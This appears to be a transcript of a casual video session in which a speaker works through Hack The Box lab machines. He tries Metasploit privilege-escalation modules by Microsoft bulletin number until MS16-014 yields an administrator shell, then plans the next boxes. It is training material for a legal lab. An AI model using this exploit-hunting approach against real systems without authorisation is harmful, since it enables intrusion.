We'll go ahead and we'll look at something. I thought that was going to work like right there. I was like, oh my God. We found one. We will find something. MS-14068. We will find something. That's an auxiliary admin. That's Kerberos checksum. I don't care about that. MS-15004. Stop giving me ones that, well, I guess I should probably read it better, huh? saying that's affected X64. 15010. That's one that I've heard of, like right there. Okay, maybe I haven't. 15051. Search for MS 15051. Whoa, that ain't right. Okay. Man, this is going to take 10 years to do, isn't it? This is going to take forever. Okay, that's okay. How we haven't killed the box yet, I don't know. But 076. That guy for Metasploit? Nope. 078. We do have a 078. MS 15078. Use 0. Well, that one actually starts off like that. Cool. All right. Guess that was not that vulnerable to it. Okay. That's 15102. Probably not going to be a Metasploit, is it? Nope. MS16. Now we're in 2016. 014. Use 1. Let's go! There we go! We got one! Oh my god, that took like, how long did that take? How long has this video been going on for? This has been an hour and 44 minutes. And we finally got it. Shell. CD into users. CD into administrator. CD into desktop. I guarantee if we just had exploit suggester, it would have just worked. You know what I'm saying? It's like, here you go, and then there you go. Type root.txt. My god, that took forever. Woo! That's how you do old stuff. Alright, own root. How difficult was that, though? What do you guys think? Because it wasn't difficult doing that. It was just extremely time-consuming, you know? It's like putting together IKEA furniture. It's not difficult. It's just you're going to take a week to do it because it's like, damn, like, I don't know. Maybe a 4? Maybe? Since we had to go through and look at every single thing. But I guarantee if we had Metasploit version 5, it would have just found it. We're going to go with a 4. We'll save it as a 4. Jeez, I'm going to take a break after that. That was miserable. I figured we'd go through a couple before I took another break, but my god, that was miserable. This will only be like a 5-minute break, though. It's not going to be no like 20-minute crap. Nothing like that. I already went to the store. So, oh my god, that was rough. The next one is going to be Granny, right? I believe. According to TJ Knowles. Bastard, yeah. Granny, Arctic, Grandpa, Silo, Bounty, Jerry, and then Conceal. We actually did Jeeves, I think, the other day, actually. Did we do Jeeves? I know we did Active. We did Netmon. Which, that's more challenging than OCP. Netmon was, That's actually pretty damn easy from what I remember the other day. But we also have to remember that it's got, it's an Active Directory network now. So, but this is like the 2019-2020 list, like right here or something like that. So this is like the updated list or whatever, But yeah, let's go ahead and get Granny fired up if it's not already. Where is Granny? Granny, look at that. Okay. So it looks like we got a lot of people thinking it's a medium box. But then again, every time you see Windows, it's all of a sudden a medium box. Did I do Granny or did I just fire up Grandpa? Granny, okay. So 10, 10, 10, 15. We'll let this guy load up and everything next. We just fired him up. Let me make sure that we actually did. Granny. Yeah, let's start that machine. And I'm going to go ahead. I'm going to take a 5-minute break, like real quick. We'll be right back. That one was rough. Very rough.